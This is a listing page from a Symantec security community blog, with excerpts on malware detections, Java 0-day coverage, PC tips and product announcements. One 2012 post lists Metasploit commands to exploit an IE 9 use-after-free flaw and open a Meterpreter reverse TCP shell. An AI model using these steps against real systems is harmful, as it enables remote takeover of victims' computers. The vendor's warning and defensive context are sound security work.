Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Community Blog
Showing posts tagged with Endpoint Protection Small Business Edition 12.x
Showing posts in English
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2


- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.


Brandon Noble | 11 Sep 2012 | 0 comments

As a Security Response Liaison, I’m often asked for links to specific information that's available on our public website. Here is a simple list of the more common pages I use for reference.

File-Based Protection (Traditional Antivirus)more info

Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...
Brandon Noble | 23 Aug 2012 | 0 comments

We have been seeing a recent wave of Trojan.Shylock variants with a lot of additional functionality than the older versions we have been used to.

Initially, many of these variants are detected generically as Backdoor.Trojan or Trojan Horse, but our new Shylock heuristic signatures (Trojan.Shylock!gen6 and Trojan.Shylock!gen7) should be changing this to a more accurate naming convention, and should be picking up a much wider spread of these threats.

Additionally we are hearing about some behavior that we have not been able to reproduce. Reports are saying that legitimate documents are getting hidden and then shortcuts with the same name of the document are being added in their place. These shortcuts actually launch a thumbs.db(x) file which is the Shylock Trojan, and they are meant to trick the user into running the threat. This is common behavior of for threats, as noted in this blog article from May 2012,...

Celeste Adamson | 08 Aug 2012 | 0 comments

The team is looking for hands-on IT professionals who currently use Symantec Endpoint Protection Small Business Edition (with at least 6 months of experience) to participate in an upcoming remote usability study!

Have a say in our design process! We will set up a feedback session via web conference so that you can interact with a prototype build of the  product and share your opinions and ideas.  It takes no longer than 90 minutes, and if permissible by your company policy, we can offer you $150 for your time.

We are planning to run these sessions between Monday, August 13th through Wednesday, August 22nd.

Send an email with the following information to sign up & get more details:

  • Name
  • Daytime phone (work/cell)
  • Time zone
  • Company name...
Mira Davda | 29 May 2012 | 0 comments

Augmented by broadband penetration smaller and emerging cities of India are exploring opportunities offered by the virtual world. This group of connected people and businesses has reached critical mass and is lucrative enough to be targeted by cyber criminals.

Indian Cities such as Bhubaneshwar, Surat, Cochin, Jaipur, Vishakhapatnam and Indore are increasingly facing the risk of cyber attacks, with one in four bot- infections in India reported in such cities, reveals India findings of Symantec Internet Security Threat Report, Volume (ISTR) 17. Also, some cities that repeatedly appear in the list for origin of phishing in India - Ahmedabad,  Nashik and Coimbatore also figure in the list of bot-infections.  Botnets are networks of zombie machines that are used to perform sophisticated attacks  and conduct coordinated attacks. The presence of bot-infected computers in these locations indicates that they are being inducted as part of a network of compromised...

Chetan Savade | 15 May 2012 | 0 comments

Hello Everyone,

Tips to improve performance, speed & security.

5 tips for PC health: Organize your folders, update Windows, run antivirus software

Working on a slow, disorganized computer can be frustrating. Read on for organization tips and guidelines to keep your PC on the right track using tools built in to the Windows operating system.

1. Organize your folders

2. Clean up your hard disk

3. Use System Restore

4. Keep Windows and Microsoft Office up-to-date

5. Run antivirus software and a spyware detection and removal tool

Reference :

Speed up your PC

A badly fragmented hard drive will bring even a top-of-the-line new computer to a grinding halt. Learn how a preventive maintenance plan can keep your Windows PC running smoothly and swiftly.


Chetan Savade | 14 May 2012 | 0 comments

Be Safe, Be Secure

Protecting confidential information is a business requirement, and in many cases also an ethical and legal requirement.

Making a plan for what to do and what not to do, e.g., types of devices you need to secure and monitoring inbound avenues of threat infiltration and outbound avenues of confidential data exfiltration

Establishing detailed policies for what employees can and cannot do regarding webmail and social media access at work – taking into account employee morale as well as productivity

Deploying a multi-layered, multi-level defense that goes beyond traditional, separated defenses such as firewalls – which are largely ineffective against today's blended and targeted attacks

Symantec has released best practices/recommendation to protect data.

Security Response recommendations for Symantec Endpoint Protection settings


Mithun Sanghavi | 21 Mar 2012 | 5 comments

Dear Valued Customers and Partners,

Here is an Opportunity for Participating in the Testing of the pre-released Symantec Endpoint Protection 12.1 RU1 MP1 Beta software.

At this time, we are accepting applications to participate in the SEP 12.1 RU1 MP1 Beta program.

With your participation, Symantec can insure another high quality release of Endpoint Protection.

Thank you for your support!  

Tmullen | 10 Feb 2012 | 3 comments

Powered by Symantec Insight™, Symantec™ Endpoint Protection is fast, powerful security for endpoints. It offers advanced
defense against all types of attacks for both physical and virtual systems. Seamlessly integrating the essential security tools
you need into a single, high performance agent with a single management console, Endpoint Protection provides world-class
protection without slowing you down.